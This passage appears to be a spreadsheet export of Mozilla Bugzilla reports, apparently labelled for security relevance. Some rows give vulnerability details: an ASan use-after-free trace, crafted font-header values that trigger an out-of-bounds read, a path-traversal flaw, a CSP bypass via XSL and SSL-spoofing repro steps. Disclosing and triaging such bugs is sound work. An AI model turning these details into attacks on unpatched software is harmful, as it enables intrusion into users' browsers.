    #10 0x7f6be92f060f in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /home/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #11 0x7f6be164a85a in nsGlobalWindow::OpenInternal(nsAString const&amp;, nsAString const&amp;, nsAString const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13036:21
    #12 0x7f6be1648f6f in OpenJS /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8924:10
    #13 0x7f6be1648f6f in nsGlobalWindow::OpenOuter(nsAString const&amp;, nsAString const&amp;, nsAString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8886
    #14 0x7f6be16493fd in nsGlobalWindow::Open(nsAString const&amp;, nsAString const&amp;, nsAString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8895:3
    #15 0x7f6be2b1fc22 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2414:56
    #16 0x7f6be2b1e500 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15689:13
    #17 0x7f6be9845724 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:293:15
    #18 0x7f6be9845724 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #19 0x7f6be982e54b in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f6be982e54b in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3060
    #21 0x7f6be98152c8 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f6be98458bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f6be9846212 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f6bea1bce1b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2948:12
    #25 0x7f6be2dae555 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #26 0x7f6be37386fb in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #27 0x7f6be37386fb in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #28 0x7f6be37017b9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1142:51
    #29 0x7f6be3703692 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1314:20
    #30 0x7f6be36e37c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #31 0x7f6be36e6c92 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:824:9
    #32 0x7f6be593e94f in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1104:7
    #33 0x7f6be888df3a in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7698:21
    #34 0x7f6be8889f98 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7496:7
    #35 0x7f6be889150f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7393:13
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:398:37 in Length
Shadow bytes around the buggy address:
  0x0c288002f5e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c288002f5f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c288002f600: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c288002f610: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c288002f620: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c288002f630: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fa fa fa
  0x0c288002f640: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c288002f650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c288002f660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c288002f670: 00 00 00 00 00 00 00 00 07 fa fa fa fa fa fa fa
  0x0c288002f680: fa fa fa fa fa fa fa fa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7239==ABORTING</t>
        </is>
      </c>
      <c r="X2618" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2619">
      <c r="A2619" t="n">
        <v>1874489</v>
      </c>
      <c r="B2619" t="inlineStr">
        <is>
          <t>2024-01-12 13:04:18 -0800</t>
        </is>
      </c>
      <c r="C2619" t="inlineStr">
        <is>
          <t>Read beyond bounds in OpenTypeSTAT::Parse()</t>
        </is>
      </c>
      <c r="D2619" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:36 -0700</t>
        </is>
      </c>
      <c r="E2619" t="n">
        <v>1</v>
      </c>
      <c r="F2619" t="n">
        <v>1</v>
      </c>
      <c r="G2619" t="n">
        <v>3</v>
      </c>
      <c r="H2619" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2619" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2619" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2619" t="inlineStr">
        <is>
          <t>Firefox 121</t>
        </is>
      </c>
      <c r="L2619" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M2619" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2619" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2619" t="inlineStr">
        <is>
          <t>[adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q2619" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2619" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2619" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T2619" t="n">
        <v>1</v>
      </c>
      <c r="U2619" t="n">
        <v>0</v>
      </c>
      <c r="V2619" t="n">
        <v>40</v>
      </c>
      <c r="W2619" t="inlineStr">
        <is>
          <t>`OpenTypeSTAT::Parse()` (`gfx\ots\src\stat.cc`) can read beyond bounds if a font header contains specially-crafted values for `designAxisSize`, `designAxisCount`, and `designAxisOffset`. The bug can be reached only on 32-bit platforms, and it appears to be latent -- Searchfox indicates that `OpenTypeSTAT::Parse()` is not called anywhere, though it is built into the Firefox executable.
The bug is on lines 62-68 (FIREFOX_121_0_RELEASE):
```
 31: bool OpenTypeSTAT::Parse(const uint8_t* data, size_t length) {
 32:   Buffer table(data, length);
 33:   if (!table.ReadU16(&amp;this-&gt;majorVersion) ||
 34:       !table.ReadU16(&amp;this-&gt;minorVersion) ||
 35:       !table.ReadU16(&amp;this-&gt;designAxisSize) ||
 36:       !table.ReadU16(&amp;this-&gt;designAxisCount) ||
 37:       !table.ReadU32(&amp;this-&gt;designAxesOffset) ||
 38:       !table.ReadU16(&amp;this-&gt;axisValueCount) ||
 39:       !table.ReadU32(&amp;this-&gt;offsetToAxisValueOffsets) ||
 40:       !(this-&gt;minorVersion &lt; 1 || table.ReadU16(&amp;this-&gt;elidedFallbackNameID))) {
 41:     return Drop("Failed to read table header");
 42:   }
 ...
 51:   if (this-&gt;designAxisSize &lt; sizeof(AxisRecord)) {
 52:     return Drop("Invalid designAxisSize");
 53:   }
 54: 
 55:   size_t headerEnd = table.offset();
 56: 
 57:   if (this-&gt;designAxisCount == 0) {
 58:     if (this-&gt;designAxesOffset != 0) {
 59:       Warning("Unexpected non-zero designAxesOffset");
 60:       this-&gt;designAxesOffset = 0;
 61:     }
 62:   } else {
 63:     if (this-&gt;designAxesOffset &lt; headerEnd ||
 64:         size_t(this-&gt;designAxesOffset) +
 65:           size_t(this-&gt;designAxisCount) * size_t(this-&gt;designAxisSize) &gt; length) {
 66:       return Drop("Invalid designAxesOffset");
 67:     }
 68:   }
```
The issue is that the calculation on lines 64-5 can overflow on 32-bit builds, because in those builds, `size_t` is 32 bits. So, for example, if `designAxesOffset` is `0xffffffff`, `designAxisCount` is `16`, and `designAxisSize` is `8`, the calculation yields `0x7f` in 32 bits. This would then pass the length check on line 65. Once that occurs, line 71 sets `table.offset_` to `0xffffffff`. The `table.Readxxx()` functions on lines 74-6 then read from `buffer_ + 0xffffffff`, then wrap back to `0`...:
```
 69: 
 70:   for (size_t i = 0; i &lt; this-&gt;designAxisCount; i++) {
 71:     table.set_offset(this-&gt;designAxesOffset + i * this-&gt;designAxisSize);
 72:     this-&gt;designAxes.emplace_back();
 73:     auto&amp; axis = this-&gt;designAxes[i];
 74:     if (!table.ReadU32(&amp;axis.axisTag) ||
 75:         !table.ReadU16(&amp;axis.axisNameID) ||
 76:         !table.ReadU16(&amp;axis.axisOrdering)) {
 77:       return Drop("Failed to read design axis");
 78:     }
 79:     if (!CheckTag(axis.axisTag)) {
 80:       return Drop("Bad design axis tag");
 81:     }
 82:     if (!ValidateNameId(axis.axisNameID)) {
 83:       return true;
 84:     }
 85:   }
```
because the `ReadUxxx()` functions' checks also overflow, e.g., `ReadU32()` (`gfx/ots/src/ots.h`) does:
```
 135: bool ReadU32(uint32_t *value) {
 136:   if (offset_ + 4 &gt; length_) {
 137:     return OTS_FAILURE();
 138:   }
 139:   std::memcpy(value, buffer_ + offset_, sizeof(uint32_t));
 140:   *value = ots_ntohl(*value);
 141:   offset_ += 4;
 142:   return true;
 143: }
```
where `offset_` isa `size_t`, so lines 136 and 141 overflow from `0xffffffff` to `3` on the first call to `ReadU32()`, passing the check on lines 136-38 and corrupting the value of `offset` on line 141.
There appears also to be a similar bug involving `offsetToAxisValueOffsets` in the same code.</t>
        </is>
      </c>
      <c r="X2619" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2620">
      <c r="A2620" t="n">
        <v>1621359</v>
      </c>
      <c r="B2620" t="inlineStr">
        <is>
          <t>2020-03-10 10:48:48 -0700</t>
        </is>
      </c>
      <c r="C2620" t="inlineStr">
        <is>
          <t>Update other-licenses/ply to support py3</t>
        </is>
      </c>
      <c r="D2620" t="inlineStr">
        <is>
          <t>2020-04-16 05:21:10 -0700</t>
        </is>
      </c>
      <c r="E2620" t="n">
        <v>1</v>
      </c>
      <c r="F2620" t="n">
        <v>1</v>
      </c>
      <c r="G2620" t="n">
        <v>7</v>
      </c>
      <c r="H2620" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2620" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J2620" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2620" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2620" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2620" t="inlineStr"/>
      <c r="Q2620" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2620" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2620" t="inlineStr">
        <is>
          <t>mozilla77</t>
        </is>
      </c>
      <c r="T2620" t="n">
        <v>1</v>
      </c>
      <c r="U2620" t="n">
        <v>0</v>
      </c>
      <c r="V2620" t="n">
        <v>9</v>
      </c>
      <c r="W2620" t="inlineStr">
        <is>
          <t>Our version of ply doesn't work with python3, which blocks us from converting some uses of python2 during a build. According to the README, this comes from http://www.dabeaz.com/ply/</t>
        </is>
      </c>
      <c r="X2620" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2621">
      <c r="A2621" t="n">
        <v>940684</v>
      </c>
      <c r="B2621" t="inlineStr">
        <is>
          <t>2013-11-19 13:57:15 -0800</t>
        </is>
      </c>
      <c r="C2621" t="inlineStr">
        <is>
          <t>Device Storage - Additional security issue with OOP on FirefoxOS</t>
        </is>
      </c>
      <c r="D2621" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:46 -0800</t>
        </is>
      </c>
      <c r="E2621" t="n">
        <v>1</v>
      </c>
      <c r="F2621" t="n">
        <v>1</v>
      </c>
      <c r="G2621" t="n">
        <v>3</v>
      </c>
      <c r="H2621" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2621" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2621" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K2621" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2621" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2621" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2621" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2621" t="inlineStr">
        <is>
          <t>[fxos:media][adv-main28+]</t>
        </is>
      </c>
      <c r="Q2621" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2621" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2621" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2621" t="n">
        <v>1</v>
      </c>
      <c r="U2621" t="n">
        <v>0</v>
      </c>
      <c r="V2621" t="n">
        <v>20</v>
      </c>
      <c r="W2621" t="inlineStr">
        <is>
          <t>This is really a follow on to bug 860934
This affects a compromised child.
In bug 860934, the child was able to send a fully qualified path to the parent.
This was addressed by splitting the full path into a storageName which identifies the root directory, and a relative path.
However, if the child were compromised, it could pass in a path which includes ../ and escape out of the storageName'd root directory.
Currently, device storage does check for ..'s in the pathname, but this check is being done in the child, and not in the parent.
Thanks goes to bent for identifying this.</t>
        </is>
      </c>
      <c r="X2621" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2622">
      <c r="A2622" t="n">
        <v>397425</v>
      </c>
      <c r="B2622" t="inlineStr">
        <is>
          <t>2007-09-24 17:27:45 -0700</t>
        </is>
      </c>
      <c r="C2622" t="inlineStr">
        <is>
          <t>update staging-build-console to Fx 2007</t>
        </is>
      </c>
      <c r="D2622" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2622" t="n">
        <v>1</v>
      </c>
      <c r="F2622" t="n">
        <v>1</v>
      </c>
      <c r="G2622" t="n">
        <v>5</v>
      </c>
      <c r="H2622" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2622" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2622" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2622" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2622" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2622" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2622" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2622" t="inlineStr">
        <is>
          <t>waiting for test run</t>
        </is>
      </c>
      <c r="Q2622" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2622" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2622" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2622" t="n">
        <v>1</v>
      </c>
      <c r="U2622" t="n">
        <v>0</v>
      </c>
      <c r="V2622" t="n">
        <v>13</v>
      </c>
      <c r="W2622" t="inlineStr">
        <is>
          <t>staging-build-console currently builds Firefox 2.0.0.4, in order to change that we need:
1) bump versions in Makefile, rebuild mirror
2) bump version in bbot master.cfg (only one place right now, the fake signing step)
3) bump versions in bootstrap.cfg
#1/#2 are easy, #3 is a little tricky because 2007 was based on a relbranch, so this'll be a good test for respin support :)</t>
        </is>
      </c>
      <c r="X2622" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2623">
      <c r="A2623" t="n">
        <v>1597645</v>
      </c>
      <c r="B2623" t="inlineStr">
        <is>
          <t>2019-11-19 01:59:26 -0800</t>
        </is>
      </c>
      <c r="C2623" t="inlineStr">
        <is>
          <t>Content-Security-Policy inline script execution is bypassed on XSL pages</t>
        </is>
      </c>
      <c r="D2623" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:47 -0700</t>
        </is>
      </c>
      <c r="E2623" t="n">
        <v>1</v>
      </c>
      <c r="F2623" t="n">
        <v>1</v>
      </c>
      <c r="G2623" t="n">
        <v>3</v>
      </c>
      <c r="H2623" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2623" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2623" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2623" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2623" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2623" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2623" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][domsecurity-active][adv-main72+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2623" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2623" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2623" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T2623" t="n">
        <v>1</v>
      </c>
      <c r="U2623" t="n">
        <v>0</v>
      </c>
      <c r="V2623" t="n">
        <v>8</v>
      </c>
      <c r="W2623" t="inlineStr">
        <is>
          <t>I discovered this issue while implementing an XSL stylesheet on an RSS feed.
Firefox (I am running version 70.0.1 on Windows 10) does not honour the Content-Security-Policy header on inline JavaScript given in an XSL template included by an XML file.
I have made some test cases which I hope are helpful:
* https://traintimes.org.uk/firefox-csp/ shows the main issue I found - it is an XML file sent with a CSP header saying no inline JavaScript, but includes an XSL stylesheet containing a template with inline JavaScript that does run in Firefox (both the inline script and the inline event handler);
* https://traintimes.org.uk/firefox-csp/html.php is the same HTML, as the XSL template but served as HTML, and here you can see the inline JavaScript does not run in Firefox.
In Chrome,  you get the error: "Refused to execute inline script because it violates the following Content Security Policy directive" on both HTML and XML versions.</t>
        </is>
      </c>
      <c r="X2623" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2624">
      <c r="A2624" t="n">
        <v>789075</v>
      </c>
      <c r="B2624" t="inlineStr">
        <is>
          <t>2012-09-06 08:46:25 -0700</t>
        </is>
      </c>
      <c r="C2624" t="inlineStr">
        <is>
          <t>Video playback causes browser to stop responding (mostly) or crash in Cleopatra tool</t>
        </is>
      </c>
      <c r="D2624" t="inlineStr">
        <is>
          <t>2017-06-07 03:06:41 -0700</t>
        </is>
      </c>
      <c r="E2624" t="n">
        <v>1</v>
      </c>
      <c r="F2624" t="n">
        <v>1</v>
      </c>
      <c r="G2624" t="n">
        <v>3</v>
      </c>
      <c r="H2624" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2624" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2624" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2624" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L2624" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2624" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2624" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2624" t="inlineStr">
        <is>
          <t>[adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q2624" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2624" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2624" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T2624" t="n">
        <v>1</v>
      </c>
      <c r="U2624" t="n">
        <v>0</v>
      </c>
      <c r="V2624" t="n">
        <v>61</v>
      </c>
      <c r="W2624" t="inlineStr">
        <is>
          <t>Visiting http://people.mozilla.com/~bgirard/cleopatra/?zippedProfile=profiles/sps-profile-1346944481.42.zip&amp;videoCapture=videos/video-1346944481.42.webm in Firefox Nightly in Windows causes the browser to crash, usually, or sometimes become very unresponsive and use lots of memory (possibly the lack of responsiveness is down to paging?)
I've not been able to profile this as I can't get it running reliably enough to do anything with it, hopefully a Windows developer/someone more familiar with Windows can look at this.
Works fine in Firefox 15 on Linux.</t>
        </is>
      </c>
      <c r="X2624" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2625">
      <c r="A2625" t="n">
        <v>757817</v>
      </c>
      <c r="B2625" t="inlineStr">
        <is>
          <t>2012-05-23 06:10:22 -0700</t>
        </is>
      </c>
      <c r="C2625" t="inlineStr">
        <is>
          <t>Modify AOL UK Repack Configuration</t>
        </is>
      </c>
      <c r="D2625" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E2625" t="n">
        <v>1</v>
      </c>
      <c r="F2625" t="n">
        <v>1</v>
      </c>
      <c r="G2625" t="n">
        <v>5</v>
      </c>
      <c r="H2625" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2625" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2625" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K2625" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2625" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2625" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2625" t="inlineStr"/>
      <c r="Q2625" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2625" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2625" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2625" t="n">
        <v>1</v>
      </c>
      <c r="U2625" t="n">
        <v>0</v>
      </c>
      <c r="V2625" t="n">
        <v>4</v>
      </c>
      <c r="W2625" t="inlineStr">
        <is>
          <t>Created attachment 626410
aoluk-ff_toolbar.xpi
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725
Steps to reproduce:
Build the AOL UK Edition for Firefox with an AOL xpi extension. The url to
get the xpi -
http://client.web.aol.com/toolbarfiles/Prod/downloads/aoluk/customfirefox/current/aoluk_toolbar.xpi
Expected results:
This is the AOL UK toolbar for the Firefox 13 release.</t>
        </is>
      </c>
      <c r="X2625" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2626">
      <c r="A2626" t="n">
        <v>536466</v>
      </c>
      <c r="B2626" t="inlineStr">
        <is>
          <t>2009-12-22 14:28:07 -0800</t>
        </is>
      </c>
      <c r="C2626" t="inlineStr">
        <is>
          <t>SSL spoofing using location.href and location.reload() with history.back() and history.forward()</t>
        </is>
      </c>
      <c r="D2626" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E2626" t="n">
        <v>1</v>
      </c>
      <c r="F2626" t="n">
        <v>1</v>
      </c>
      <c r="G2626" t="n">
        <v>6</v>
      </c>
      <c r="H2626" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2626" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2626" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K2626" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2626" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2626" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2626" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2626" t="inlineStr">
        <is>
          <t>[sg:moderate spoof][3.6.x]</t>
        </is>
      </c>
      <c r="Q2626" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2626" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2626" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2626" t="n">
        <v>1</v>
      </c>
      <c r="U2626" t="n">
        <v>0</v>
      </c>
      <c r="V2626" t="n">
        <v>45</v>
      </c>
      <c r="W2626" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
When you enter an address with an automatic redirection enabled on an other adress (with SSL certificat) , 
enter again the same adress( with redirection disabled) , 
actualize again the same page (with automatic redirection enabled),
history.back() &amp; history.forward().
Reproducible: Always
Steps to Reproduce:
Step 1=&gt; enter an adress with an automatic redirection on an https website with SSL cetificat 
Step 2=&gt; reopen the same adress but this time with redirection disabled
Step 3=&gt; actualize (the redirection must be re-enabled automaticatly)
Step 4=&gt; Go back &amp; forward
or
Step 1=&gt; Create an html file PoC with a special javascript and an other file with an activation/desactivation of the automatic rediction faith on two
Step 2=&gt; Open the page
Actual Results:  
The adress (with redirection enabled/disabled) takes content and SSL certificat of the HTTPS website</t>
        </is>
      </c>
      <c r="X2626" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2627">
      <c r="A2627" t="n">
        <v>1101285</v>
      </c>
      <c r="B2627" t="inlineStr">
        <is>
          <t>2014-11-18 17:12:48 -0800</t>
        </is>
      </c>
      <c r="C2627" t="inlineStr">
        <is>
          <t>Rebooting through slave health fails with "400 Client Error: Bad Request" if problem tracking bug can't be retrieved</t>
        </is>
